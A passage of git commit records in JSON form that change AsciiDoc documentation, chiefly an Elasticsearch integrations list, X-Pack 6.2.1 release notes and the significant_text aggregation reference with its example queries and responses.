\/elasticsearch,kingaj\/elasticsearch,infusionsoft\/elasticsearch,pozhidaevak\/elasticsearch,ouyangkongtong\/elasticsearch,AleksKochev\/elasticsearch,strapdata\/elassandra,huanzhong\/elasticsearch,onegambler\/elasticsearch,kenshin233\/elasticsearch,palecur\/elasticsearch,YosuaMichael\/elasticsearch,djschny\/elasticsearch,luiseduardohdbackup\/elasticsearch,mohsinh\/elasticsearch,hydro2k\/elasticsearch,vietl
q\/elasticsearch,sneivandt\/elasticsearch,pritishppai\/elasticsearch,masterweb121\/elasticsearch,wayeast\/elasticsearch,rmuir\/elasticsearch,ivansun1010\/elasticsearch,mbrukman\/elasticsearch,NBSW\/elasticsearch,combinatorist\/elasticsearch,jeteve\/elasticsearch,sposam\/elasticsearch,dylan8902\/elasticsearch,winstonewert\/elasticsearch,lmtwga\/elasticsearch,dongjoon-hyun\/elasticsearch,vingupta3\/elasticsearch,apepper\/elasticsearch,LeoYao\/elasticsearch,fernandozhu\/elasticsearch,Shekharrajak\/elasticsearch,MisterAndersen\/elasticsearch,likaiwalkman\/elasticsearch","old_file":"docs\/community\/integrations.asciidoc","new_file":"docs\/community\/integrations.asciidoc","new_contents":"[[integrations]]\n== Integrations\n\n\n* http:\/\/grails.org\/plugin\/elasticsearch[Grails]:\n ElasticSearch Grails plugin.\n\n* https:\/\/github.com\/carrot2\/elasticsearch-carrot2[carrot2]:\n Results clustering with carrot2\n\n* https:\/\/github.com\/angelf\/escargot[escargot]:\n ElasticSearch connector for Rails (WIP).\n\n* https:\/\/metacpan.org\/module\/Catalyst::Model::Search::ElasticSearch[Catalyst]:\n ElasticSearch and Catalyst integration.\n\n* http:\/\/github.com\/aparo\/django-elasticsearch[django-elasticsearch]:\n Django ElasticSearch Backend.\n\n* http:\/\/github.com\/Aconex\/elasticflume[elasticflume]:\n http:\/\/github.com\/cloudera\/flume[Flume] sink implementation.\n\n* http:\/\/code.google.com\/p\/terrastore\/wiki\/Search_Integration[Terrastore Search]:\n http:\/\/code.google.com\/p\/terrastore\/[Terrastore] integration module with elasticsearch.\n\n* https:\/\/github.com\/infochimps\/wonderdog[Wonderdog]:\n Hadoop bulk loader into elasticsearch.\n\n* http:\/\/geeks.aretotally.in\/play-framework-module-elastic-search-distributed-searching-with-json-http-rest-or-java[Play!Framework]:\n Integrate with Play! Framework Application.\n\n* https:\/\/github.com\/Exercise\/FOQElasticaBundle[ElasticaBundle]:\n Symfony2 Bundle wrapping Elastica.\n\n* http:\/\/drupal.org\/project\/elasticsearch[Drupal]:\n Drupal ElasticSearch integration.\n\n* https:\/\/github.com\/refuge\/couch_es[couch_es]:\n elasticsearch helper for couchdb based products (apache couchdb, bigcouch & refuge)\n\n* https:\/\/github.com\/sonian\/elasticsearch-jetty[Jetty]:\n Jetty HTTP Transport\n\n* https:\/\/github.com\/dadoonet\/spring-elasticsearch[Spring Elasticsearch]:\n Spring Factory for Elasticsearch\n\n* https:\/\/camel.apache.org\/elasticsearch.html[Apache Camel Integration]:\n An Apache camel component to integrate elasticsearch\n\n* https:\/\/github.com\/tlrx\/elasticsearch-test[elasticsearch-test]:\n Elasticsearch Java annotations for unit testing with\n http:\/\/www.junit.org\/[JUnit]\n\n* http:\/\/searchbox-io.github.com\/wp-elasticsearch\/[Wp-ElasticSearch]:\n ElasticSearch WordPress Plugin\n\n* https:\/\/github.com\/OlegKunitsyn\/eslogd[eslogd]:\n Linux daemon that replicates events to a central ElasticSearch server in real-time\n\n* https:\/\/github.com\/drewr\/elasticsearch-clojure-repl[elasticsearch-clojure-repl]:\n Plugin that embeds nREPL for run-time introspective adventure! 
Also\n serves as an nREPL transport.\n\n* http:\/\/haystacksearch.org\/[Haystack]:\n Modular search for Django\n\n* https:\/\/github.com\/cleverage\/play2-elasticsearch[play2-elasticsearch]:\n ElasticSearch module for Play Framework 2.x\n\n* https:\/\/github.com\/fullscale\/dangle[dangle]:\n A set of AngularJS directives that provide common visualizations for elasticsearch based on\n D3.\n\n* https:\/\/github.com\/roundscope\/ember-data-elasticsearch-kit[ember-data-elasticsearch-kit]:\n An ember-data kit for both pushing and querying objects to ElasticSearch cluster\n","old_contents":"[[integrations]]\n== Integrations\n\n\n* http:\/\/grails.org\/plugin\/elasticsearch[Grails]:\n ElasticSearch Grails plugin.\n\n* https:\/\/github.com\/carrot2\/elasticsearch-carrot2[carrot2]:\n Results clustering with carrot2\n\n* https:\/\/github.com\/angelf\/escargot[escargot]:\n ElasticSearch connector for Rails (WIP).\n\n* https:\/\/metacpan.org\/module\/Catalyst::Model::Search::ElasticSearch[Catalyst]:\n ElasticSearch and Catalyst integration.\n\n* http:\/\/github.com\/aparo\/django-elasticsearch[django-elasticsearch]:\n Django ElasticSearch Backend.\n\n* http:\/\/github.com\/Aconex\/elasticflume[elasticflume]:\n http:\/\/github.com\/cloudera\/flume[Flume] sink implementation.\n\n* http:\/\/code.google.com\/p\/terrastore\/wiki\/Search_Integration[Terrastore Search]:\n http:\/\/code.google.com\/p\/terrastore\/[Terrastore] integration module with elasticsearch.\n\n* https:\/\/github.com\/infochimps\/wonderdog[Wonderdog]:\n Hadoop bulk loader into elasticsearch.\n\n* http:\/\/geeks.aretotally.in\/play-framework-module-elastic-search-distributed-searching-with-json-http-rest-or-java[Play!Framework]:\n Integrate with Play! Framework Application.\n\n* https:\/\/github.com\/Exercise\/FOQElasticaBundle[ElasticaBundle]:\n Symfony2 Bundle wrapping Elastica.\n\n* http:\/\/drupal.org\/project\/elasticsearch[Drupal]:\n Drupal ElasticSearch integration.\n\n* https:\/\/github.com\/refuge\/couch_es[couch_es]:\n elasticsearch helper for couchdb based products (apache couchdb, bigcouch & refuge)\n\n* https:\/\/github.com\/sonian\/elasticsearch-jetty[Jetty]:\n Jetty HTTP Transport\n\n* https:\/\/github.com\/dadoonet\/spring-elasticsearch[Spring Elasticsearch]:\n Spring Factory for Elasticsearch\n\n* https:\/\/camel.apache.org\/elasticsearch.html[Apache Camel Integration]:\n An Apache camel component to integrate elasticsearch\n\n* https:\/\/github.com\/tlrx\/elasticsearch-test[elasticsearch-test]:\n Elasticsearch Java annotations for unit testing with\n http:\/\/www.junit.org\/[JUnit]\n\n* http:\/\/searchbox-io.github.com\/wp-elasticsearch\/[Wp-ElasticSearch]:\n ElasticSearch WordPress Plugin\n\n* https:\/\/github.com\/OlegKunitsyn\/eslogd[eslogd]:\n Linux daemon that replicates events to a central ElasticSearch server in real-time\n\n* https:\/\/github.com\/drewr\/elasticsearch-clojure-repl[elasticsearch-clojure-repl]:\n Plugin that embeds nREPL for run-time introspective adventure! 
Also\n serves as an nREPL transport.\n\n* http:\/\/haystacksearch.org\/[Haystack]:\n Modular search for Django\n\n* https:\/\/github.com\/cleverage\/play2-elasticsearch[play2-elasticsearch]:\n ElasticSearch module for Play Framework 2.x\n\n* https:\/\/github.com\/fullscale\/dangle[dangle]:\n A set of AngularJS directives that provide common visualizations for elasticsearch based on\n D3.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c05defe73db7ef2751109e403c0f9e9d0afc66e2","subject":"[DOCS] Drafted 6.2.1 security release notes (elastic\/x-pack-elasticsearch#3873)","message":"[DOCS] Drafted 6.2.1 security release notes (elastic\/x-pack-elasticsearch#3873)\n\nOriginal commit: elastic\/x-pack-elasticsearch@61e3f0cd993f78529f673e3d425dc92d0e99b60a\n","repos":"strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra","old_file":"docs\/en\/release-notes\/6.2.1.asciidoc","new_file":"docs\/en\/release-notes\/6.2.1.asciidoc","new_contents":"[role=\"xpack\"]\n[[xes-6.2.1]]\n== {es} {xpack} 6.2.1 Release Notes\n++++\n<titleabbrev>6.2.1 Release Notes<\/titleabbrev>\n++++\n\n[[xes-bug-6.2.1]]\n[float]\n=== Bug fixes\n\nSecurity::\n* Fixed missing dependencies for x-pack-transport.\n\/\/Repo: x-pack-elasticsearch\n\/\/Pull: 3860\n* Fixed `saml-metadata` env file such that it sources the appropriate\nenvironment file.\n\/\/Repo: x-pack-elasticsearch\n\/\/Pull: 3848\n* If the realm uses native role mappings and the security index health changes,\nthe realm caches are cleared. For example, they are cleared when the index\nrecovers from a red state, when the index is deleted, when the index becomes\noutdated, or when the index becomes up-to-date.\n\/\/Repo: x-pack-elasticsearch\n\/\/Pull: 3782\n","old_contents":"[role=\"xpack\"]\n[[xes-6.2.1]]\n== {es} {xpack} 6.2.1 Release Notes\n++++\n<titleabbrev>6.2.1 Release Notes<\/titleabbrev>\n++++\n\nTo be determined...\n\n\/\/\/\/\n[[xes-bug-6.2.1]]\n[float]\n=== Bug fixes\n\nSecurity::\n* Remove transport client dependency on security\n\/\/Repo: x-pack-elasticsearch\n\/\/Pull: 3860\n* [Security] Fix saml-metadata env files\n\/\/Repo: x-pack-elasticsearch\n\/\/Pull: 3848\n* [Security] Clear Realm Caches on role mapping health change\n\/\/Repo: x-pack-elasticsearch\n\/\/Pull: 3782\n* [Security] Reset IndexAuditTrail to INITIALISED before start\n\/\/Repo: x-pack-elasticsearch\n\/\/Pull: 3807\n\/\/\/\/\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7a3f0c70c982a0233369168818699d74d39693aa","subject":"Observability metadata docs conditionally available","message":"Observability metadata docs conditionally available\n\nwe will enable the metadata documentation only if we're NOT in the release train documentation","repos":"spring-cloud\/spring-cloud-task,cppwfs\/spring-cloud-task","old_file":"docs\/src\/main\/asciidoc\/appendix.adoc","new_file":"docs\/src\/main\/asciidoc\/appendix.adoc","new_contents":"\n[[appendix]]\n= Appendices\n\ninclude::appendix-task-repository-schema.adoc[]\n\ninclude::appendix-building-the-documentation.adoc[]\n\nifndef::train-docs[]\ninclude::_observability.adoc[]\nendif::[]\n\n","old_contents":"\n[[appendix]]\n= Appendices\n\ninclude::appendix-task-repository-schema.adoc[]\n\ninclude::appendix-building-the-documentation.adoc[]\n\ninclude::_observability.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"2c3be1244ec61bcafe4ba0922266c30803dd9228","subject":"[Docs] Add note on limitation for significant_text with nested objects (#28052)","message":"[Docs] Add note on limitation for significant_text with nested objects (#28052)\n\nAdd section to `significant_text` documentation mentioning that it currently\r\ndoes not support use on nested objects.\r\n\r\nRelates to #28050","repos":"vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elasticassandra,vroyer\/elasticassandra,strapdata\/elassandra,vroyer\/elasticassandra","old_file":"docs\/reference\/aggregations\/bucket\/significanttext-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/bucket\/significanttext-aggregation.asciidoc","new_contents":"[[search-aggregations-bucket-significanttext-aggregation]]\n=== Significant Text Aggregation\n\nexperimental[]\n\nAn aggregation that returns interesting or unusual occurrences of free-text terms in a set.\nIt is like the <<search-aggregations-bucket-significantterms-aggregation,significant terms>> aggregation but differs in that:\n\n* It is specifically designed for use on type `text` fields\n* It does not require field data or doc-values\n* It re-analyzes text content on-the-fly meaning it can also filter duplicate sections of\nnoisy text that otherwise tend to skew statistics.\n\nWARNING: Re-analyzing _large_ result sets will require a lot of time and memory. It is recommended that the significant_text\n aggregation is used as a child of either the <<search-aggregations-bucket-sampler-aggregation,sampler>> or \n <<search-aggregations-bucket-diversified-sampler-aggregation,diversified sampler>> aggregation to limit the analysis\n to a _small_ selection of top-matching documents e.g. 200. This will typically improve speed, memory use and quality of\n results.\n\n.Example use cases:\n* Suggesting \"H5N1\" when users search for \"bird flu\" to help expand queries\n* Suggesting keywords relating to stock symbol $ATI for use in an automated news classifier\n\nIn these cases the words being selected are not simply the most popular terms in results. The most popular words tend to be\nvery boring (_and, of, the, we, I, they_ ...).\nThe significant words are the ones that have undergone a significant change in popularity measured between a _foreground_ and _background_ set.\nIf the term \"H5N1\" only exists in 5 documents in a 10 million document index and yet is found in 4 of the 100 documents that make up a user's search results\nthat is significant and probably very relevant to their search. 5\/10,000,000 vs 4\/100 is a big swing in frequency.\n\nexperimental[The `significant_text` aggregation is new and may change in non-backwards compatible ways if we add further text-analysis features e.g. 
phrase detection]\n\n==== Basic use\n\nIn the typical use case, the _foreground_ set of interest is a selection of the top-matching search results for a query \nand the _background_set used for statistical comparisons is the index or indices from which the results were gathered.\n\nExample:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\" : {\n \"match\" : {\"content\" : \"Bird flu\"}\n },\n \"aggregations\" : {\n \"my_sample\" : {\n \"sampler\" : {\n \"shard_size\" : 100\n },\n \"aggregations\": {\n \"keywords\" : {\n \"significant_text\" : { \"field\" : \"content\" }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\n\n\nResponse:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\": 9,\n \"timed_out\": false,\n \"_shards\": ...,\n \"hits\": ...,\n \"aggregations\" : {\n \"my_sample\": {\n \"doc_count\": 100,\n \"keywords\" : {\n \"doc_count\": 100,\n \"buckets\" : [\n {\n \"key\": \"h5n1\",\n \"doc_count\": 4,\n \"score\": 4.71235374214817,\n \"bg_count\": 5\n }\n ...\n ]\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nThe results show that \"h5n1\" is one of several terms strongly associated with bird flu.\nIt only occurs 5 times in our index as a whole (see the `bg_count`) and yet 4 of these \nwere lucky enough to appear in our 100 document sample of \"bird flu\" results. That suggests\na significant word and one which the user can potentially add to their search. \n\n\n==== Dealing with noisy data using `filter_duplicate_text`\nFree-text fields often contain a mix of original content and mechanical copies of text (cut-and-paste biographies, email reply chains, \nretweets, boilerplate headers\/footers, page navigation menus, sidebar news links, copyright notices, standard disclaimers, addresses).\n\nIn real-world data these duplicate sections of text tend to feature heavily in `significant_text` results if they aren't filtered out.\nFiltering near-duplicate text is a difficult task at index-time but we can cleanse the data on-the-fly at query time using the \n`filter_duplicate_text` setting.\n\n\nFirst let's look at an unfiltered real-world example using the http:\/\/research.signalmedia.co\/newsir16\/signal-dataset.html[Signal media dataset] of\na million news articles covering a wide variety of news. Here are the raw significant text results for a search for the articles \nmentioning \"elasticsearch\":\n\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"sample\": {\n \"doc_count\": 35,\n \"keywords\": {\n \"doc_count\": 35,\n \"buckets\": [\n {\n \"key\": \"elasticsearch\",\n \"doc_count\": 35,\n \"score\": 28570.428571428572,\n \"bg_count\": 35\n },\n ...\n {\n \"key\": \"currensee\",\n \"doc_count\": 8,\n \"score\": 6530.383673469388,\n \"bg_count\": 8\n },\n ...\n {\n \"key\": \"pozmantier\",\n \"doc_count\": 4,\n \"score\": 3265.191836734694,\n \"bg_count\": 4\n },\n ...\n\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nThe uncleansed documents have thrown up some odd-looking terms that are, on the face of it, statistically \ncorrelated with appearances of our search term \"elasticsearch\" e.g. 
\"pozmantier\".\nWe can drill down into examples of these documents to see why pozmantier is connected using this query:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\": {\n \"simple_query_string\": {\n \"query\": \"+elasticsearch +pozmantier\"\n }\n },\n \"_source\": [\n \"title\",\n \"source\"\n ],\n \"highlight\": {\n \"fields\": {\n \"content\": {}\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\nThe results show a series of very similar news articles about a judging panel for a number of tech projects:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"hits\": {\n \"hits\": [\n {\n ...\n \"_source\": {\n \"source\": \"Presentation Master\",\n \"title\": \"T.E.N. Announces Nominees for the 2015 ISE\u00ae North America Awards\"\n },\n \"highlight\": {\n \"content\": [\n \"City of San Diego Mike <em>Pozmantier<\/em>, Program Manager, Cyber Security Division, Department of\",\n \" Janus, Janus <em>ElasticSearch<\/em> Security Visualization Engine \"\n ]\n }\n },\n {\n ...\n \"_source\": {\n \"source\": \"RCL Advisors\",\n \"title\": \"T.E.N. Announces Nominees for the 2015 ISE(R) North America Awards\"\n },\n \"highlight\": {\n \"content\": [\n \"Mike <em>Pozmantier<\/em>, Program Manager, Cyber Security Division, Department of Homeland Security S&T\",\n \"Janus, Janus <em>ElasticSearch<\/em> Security Visualization Engine\"\n ]\n }\n },\n ...\n--------------------------------------------------\n\/\/ NOTCONSOLE\nMike Pozmantier was one of many judges on a panel and elasticsearch was used in one of many projects being judged.\n\nAs is typical, this lengthy press release was cut-and-paste by a variety of news sites and consequently any rare names, numbers or \ntypos they contain become statistically correlated with our matching query.\n\nFortunately similar documents tend to rank similarly so as part of examining the stream of top-matching documents the significant_text\naggregation can apply a filter to remove sequences of any 6 or more tokens that have already been seen. 
Let's try this same query now but\nwith the `filter_duplicate_text` setting turned on:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\": {\n \"match\": {\n \"content\": \"elasticsearch\"\n }\n },\n \"aggs\": {\n \"sample\": {\n \"sampler\": {\n \"shard_size\": 100\n },\n \"aggs\": {\n \"keywords\": {\n \"significant_text\": {\n \"field\": \"content\",\n \"filter_duplicate_text\": true\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\n\nThe results from analysing our deduplicated text are obviously of higher quality to anyone familiar with the elastic stack:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"sample\": {\n \"doc_count\": 35,\n \"keywords\": {\n \"doc_count\": 35,\n \"buckets\": [\n {\n \"key\": \"elasticsearch\",\n \"doc_count\": 22,\n \"score\": 11288.001166180758,\n \"bg_count\": 35\n },\n {\n \"key\": \"logstash\",\n \"doc_count\": 3,\n \"score\": 1836.648979591837,\n \"bg_count\": 4\n },\n {\n \"key\": \"kibana\",\n \"doc_count\": 3,\n \"score\": 1469.3020408163263,\n \"bg_count\": 5\n }\n ]\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nMr Pozmantier and other one-off associations with elasticsearch no longer appear in the aggregation \nresults as a consequence of copy-and-paste operations or other forms of mechanical repetition. \n\nIf your duplicate or near-duplicate content is identifiable via a single-value indexed field (perhaps\na hash of the article's `title` text or an `original_press_release_url` field) then it would be more \nefficient to use a parent <<search-aggregations-bucket-diversified-sampler-aggregation,diversified sampler>> aggregation\nto eliminate these documents from the sample set based on that single key. The less duplicate content you can feed into\nthe significant_text aggregation up front the better in terms of performance.\n\n\n.How are the significance scores calculated?\n**********************************\nThe numbers returned for scores are primarily intended for ranking different suggestions sensibly rather than something easily \nunderstood by end users. The scores are derived from the doc frequencies in _foreground_ and _background_ sets. In brief, a \nterm is considered significant if there is a noticeable difference in the frequency in which a term appears in the subset and \nin the background. The way the terms are ranked can be configured, see \"Parameters\" section.\n\n**********************************\n\n.Use the _\"like this but not this\"_ pattern\n**********************************\nYou can spot mis-categorized content by first searching a structured field e.g. `category:adultMovie` and use significant_text on the\ntext \"movie_description\" field. 
Take the suggested words (I'll leave them to your imagination) and then search for all movies NOT marked as category:adultMovie but containing these keywords.\nYou now have a ranked list of badly-categorized movies that you should reclassify or at least remove from the \"familyFriendly\" category.\n\nThe significance score from each term can also provide a useful `boost` setting to sort matches.\nUsing the `minimum_should_match` setting of the `terms` query with the keywords will help control the balance of precision\/recall in the result set i.e\na high setting would have a small number of relevant results packed full of keywords and a setting of \"1\" would produce a more exhaustive results set with all documents containing _any_ keyword.\n\n**********************************\n\n\n\n==== Limitations\n\n\n===== No support for child aggregations\nThe significant_text aggregation intentionally does not support the addition of child aggregations because:\n\n* It would come with a high memory cost\n* It isn't a generally useful feature and there is a workaround for those that need it\n\nThe volume of candidate terms is generally very high and these are pruned heavily before the final\nresults are returned. Supporting child aggregations would generate additional churn and be inefficient.\nClients can always take the heavily-trimmed set of results from a `significant_text` request and \nmake a subsequent follow-up query using a `terms` aggregation with an `include` clause and child\naggregations to perform further analysis of selected keywords in a more efficient fashion.\n\n===== No support for nested objects\n\nThe significant_text aggregation currently also cannot be used with text fields in\nnested objects, because it works with the document JSON source. This makes this\nfeature inefficient when matching nested docs from stored JSON given a matching\nLucene docID.\n\n===== Approximate counts\nThe counts of how many documents contain a term provided in results are based on summing the samples returned from each shard and\nas such may be:\n\n* low if certain shards did not provide figures for a given term in their top sample\n* high when considering the background frequency as it may count occurrences found in deleted documents\n\nLike most design decisions, this is the basis of a trade-off in which we have chosen to provide fast performance at the cost of some (typically small) inaccuracies.\nHowever, the `size` and `shard size` settings covered in the next section provide tools to help control the accuracy levels.\n\n==== Parameters\n\n===== Significance heuristics\n\nThis aggregation supports the same scoring heuristics (JLH, mutual_information, gnd, chi_square etc) as the <<search-aggregations-bucket-significantterms-aggregation,significant terms>> aggregation\n\n\n===== Size & Shard Size\n\nThe `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. 
By default, the node coordinating the search process will request each shard to provide its own top term buckets
and, once all shards respond, it will reduce the results to the final list that will then be returned to the client.
If the number of unique terms is greater than `size`, the returned list can be slightly off and not accurate
(it could be that the term counts are slightly off and it could even be that a term that should have been in the top
`size` buckets was not returned).

To ensure better accuracy, a multiple of the final `size` is used as the number of terms to request from each shard,
using a heuristic based on the number of shards. To take manual control of this setting, the `shard_size` parameter
can be used to control the volume of candidate terms produced by each shard.

Low-frequency terms can turn out to be the most interesting ones once all results are combined, so the
significant_text aggregation can produce higher-quality results when the `shard_size` parameter is set to
values significantly higher than the `size` setting. This ensures that a bigger volume of promising candidate terms is given
a consolidated review by the reducing node before the final selection. Obviously, large candidate term lists
will cause extra network traffic and RAM usage, so this is a quality/cost trade-off that needs to be balanced. If `shard_size` is set to -1 (the default) then `shard_size` will be automatically estimated based on the number of shards and the `size` parameter.


NOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, elasticsearch will
 override it and reset it to be equal to `size`.

===== Minimum document count

It is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option.
The default value is 3.

Terms that score highly will be collected on a shard level and merged with the terms collected from other shards in a second step.
However, a shard does not have the information about the global term frequencies available. The decision whether a term is added to a
candidate list depends only on the score computed on the shard using local shard frequencies, not the global frequencies of the word.
The `min_doc_count` criterion is only applied after merging the local term statistics of all shards. In a way, the decision to add the
term as a candidate is made without being very _certain_ about whether the term will actually reach the required `min_doc_count`.
This might cause many (globally) high-frequency terms to be missing from the final result if low-frequency but high-scoring terms populated
the candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards.
However, this increases memory consumption and network traffic.

`shard_min_doc_count` parameter

The parameter `shard_min_doc_count` regulates the _certainty_ a shard has about whether a term should actually be added to the candidate list
with respect to the `min_doc_count`. Terms will only be considered if their local shard frequency within the set is higher than the
`shard_min_doc_count`. If your dictionary contains many low-frequency words that you are not interested in (for example misspellings),
then you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will, with reasonable certainty,
not reach the required `min_doc_count` even after merging the local frequencies.
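
To make the interplay of the two settings concrete, here is a sketch (the thresholds are chosen purely for illustration, not as recommendations):

[source,js]
--------------------------------------------------
GET news/article/_search
{
  "query": { "match": { "content": "Bird flu" } },
  "aggs": {
    "keywords": {
      "significant_text": {
        "field": "content",
        "min_doc_count": 5,
        "shard_min_doc_count": 2
      }
    }
  }
}
--------------------------------------------------
// NOTCONSOLE
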
`shard_min_doc_count` is set to `1` per default and has \nno effect unless you explicitly set it.\n\n\n\n\nWARNING: Setting `min_doc_count` to `1` is generally not advised as it tends to return terms that\n are typos or other bizarre curiosities. Finding more than one instance of a term helps\n reinforce that, while still rare, the term was not the result of a one-off accident. The\n default value of 3 is used to provide a minimum weight-of-evidence.\n Setting `shard_min_doc_count` too high will cause significant candidate terms to be filtered out on a shard level. \n This value should be set much lower than `min_doc_count\/#shards`.\n\n\n\n===== Custom background context\n\nThe default source of statistical information for background term frequencies is the entire index and this\nscope can be narrowed through the use of a `background_filter` to focus in on significant terms within a narrower\ncontext:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\" : {\n \"match\" : {\n \"content\" : \"madrid\"\n }\n },\n \"aggs\" : {\n \"tags\" : {\n \"significant_text\" : {\n \"field\" : \"content\",\n \"background_filter\": {\n \"term\" : { \"content\" : \"spain\"}\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\n\nThe above filter would help focus in on terms that were peculiar to the city of Madrid rather than revealing\nterms like \"Spanish\" that are unusual in the full index's worldwide context but commonplace in the subset of documents containing the\nword \"Spain\".\n\nWARNING: Use of background filters will slow the query as each term's postings must be filtered to determine a frequency\n\n\n===== Dealing with source and index mappings\n\nOrdinarily the indexed field name and the original JSON field being retrieved share the same name.\nHowever with more complex field mappings using features like `copy_to` the source \nJSON field(s) and the indexed field being aggregated can differ.\nIn these cases it is possible to list the JSON _source fields from which text\nwill be analyzed using the `source_fields` parameter:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\" : {\n \"match\" : {\n \"custom_all\" : \"elasticsearch\"\n }\n },\n \"aggs\" : {\n \"tags\" : {\n \"significant_text\" : {\n \"field\" : \"custom_all\",\n \"source_fields\": [\"content\" , \"title\"]\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\n\n\n===== Filtering Values\n\nIt is possible (although rarely required) to filter the values for which buckets will be created. This can be done using the `include` and\n`exclude` parameters which are based on a regular expression string or arrays of exact terms. 
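
For example, the following sketch (a hypothetical filter, not taken from the reference) keeps only terms matching a pattern while excluding the search term itself:

[source,js]
--------------------------------------------------
GET news/article/_search
{
  "query": { "match": { "content": "elasticsearch" } },
  "aggs": {
    "keywords": {
      "significant_text": {
        "field": "content",
        "include": "elastic.*",
        "exclude": [ "elasticsearch" ]
      }
    }
  }
}
--------------------------------------------------
// NOTCONSOLE
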
This functionality mirrors the features\ndescribed in the <<search-aggregations-bucket-terms-aggregation,terms aggregation>> documentation.\n\n\n","old_contents":"[[search-aggregations-bucket-significanttext-aggregation]]\n=== Significant Text Aggregation\n\nexperimental[]\n\nAn aggregation that returns interesting or unusual occurrences of free-text terms in a set.\nIt is like the <<search-aggregations-bucket-significantterms-aggregation,significant terms>> aggregation but differs in that:\n\n* It is specifically designed for use on type `text` fields\n* It does not require field data or doc-values\n* It re-analyzes text content on-the-fly meaning it can also filter duplicate sections of\nnoisy text that otherwise tend to skew statistics.\n\nWARNING: Re-analyzing _large_ result sets will require a lot of time and memory. It is recommended that the significant_text\n aggregation is used as a child of either the <<search-aggregations-bucket-sampler-aggregation,sampler>> or \n <<search-aggregations-bucket-diversified-sampler-aggregation,diversified sampler>> aggregation to limit the analysis\n to a _small_ selection of top-matching documents e.g. 200. This will typically improve speed, memory use and quality of\n results.\n\n.Example use cases:\n* Suggesting \"H5N1\" when users search for \"bird flu\" to help expand queries\n* Suggesting keywords relating to stock symbol $ATI for use in an automated news classifier\n\nIn these cases the words being selected are not simply the most popular terms in results. The most popular words tend to be\nvery boring (_and, of, the, we, I, they_ ...).\nThe significant words are the ones that have undergone a significant change in popularity measured between a _foreground_ and _background_ set.\nIf the term \"H5N1\" only exists in 5 documents in a 10 million document index and yet is found in 4 of the 100 documents that make up a user's search results\nthat is significant and probably very relevant to their search. 5\/10,000,000 vs 4\/100 is a big swing in frequency.\n\nexperimental[The `significant_text` aggregation is new and may change in non-backwards compatible ways if we add further text-analysis features e.g. 
phrase detection]\n\n==== Basic use\n\nIn the typical use case, the _foreground_ set of interest is a selection of the top-matching search results for a query \nand the _background_set used for statistical comparisons is the index or indices from which the results were gathered.\n\nExample:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\" : {\n \"match\" : {\"content\" : \"Bird flu\"}\n },\n \"aggregations\" : {\n \"my_sample\" : {\n \"sampler\" : {\n \"shard_size\" : 100\n },\n \"aggregations\": {\n \"keywords\" : {\n \"significant_text\" : { \"field\" : \"content\" }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\n\n\nResponse:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\": 9,\n \"timed_out\": false,\n \"_shards\": ...,\n \"hits\": ...,\n \"aggregations\" : {\n \"my_sample\": {\n \"doc_count\": 100,\n \"keywords\" : {\n \"doc_count\": 100,\n \"buckets\" : [\n {\n \"key\": \"h5n1\",\n \"doc_count\": 4,\n \"score\": 4.71235374214817,\n \"bg_count\": 5\n }\n ...\n ]\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nThe results show that \"h5n1\" is one of several terms strongly associated with bird flu.\nIt only occurs 5 times in our index as a whole (see the `bg_count`) and yet 4 of these \nwere lucky enough to appear in our 100 document sample of \"bird flu\" results. That suggests\na significant word and one which the user can potentially add to their search. \n\n\n==== Dealing with noisy data using `filter_duplicate_text`\nFree-text fields often contain a mix of original content and mechanical copies of text (cut-and-paste biographies, email reply chains, \nretweets, boilerplate headers\/footers, page navigation menus, sidebar news links, copyright notices, standard disclaimers, addresses).\n\nIn real-world data these duplicate sections of text tend to feature heavily in `significant_text` results if they aren't filtered out.\nFiltering near-duplicate text is a difficult task at index-time but we can cleanse the data on-the-fly at query time using the \n`filter_duplicate_text` setting.\n\n\nFirst let's look at an unfiltered real-world example using the http:\/\/research.signalmedia.co\/newsir16\/signal-dataset.html[Signal media dataset] of\na million news articles covering a wide variety of news. Here are the raw significant text results for a search for the articles \nmentioning 